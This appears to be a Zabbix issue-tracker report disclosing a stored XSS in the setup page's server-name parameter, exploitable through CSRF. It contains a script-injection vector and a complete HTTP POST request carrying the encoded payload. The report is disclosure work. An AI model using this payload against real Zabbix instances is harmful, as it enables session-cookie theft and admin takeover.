XMLWordPrintable

      There is a Stored XSS vulnerability in Server name parameter

      This parameter is specified during the initial setup, but since the /zabbix/setup.php still available after the setup and there is no protection against CSRF attacks, malicious attacker could convince Admin to execute the script via CSRF Attack

      Vulnerable parameter is zbx_server_name
      Example vector: </title><script>alert(document.cookie)</script>

      Example request for setting up the Server name will be:
      POST /zabbix/setup.php HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://127.0.0.1/zabbix/setup.php
      Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
      DNT: 1
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 184

      sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step

            Unassigned Unassigned
            osakaaa Andrey Plastunov
            Votes:
            0 Vote for this issue
            Watchers:
            5 Start watching this issue

              Created:
              Updated:
              Resolved: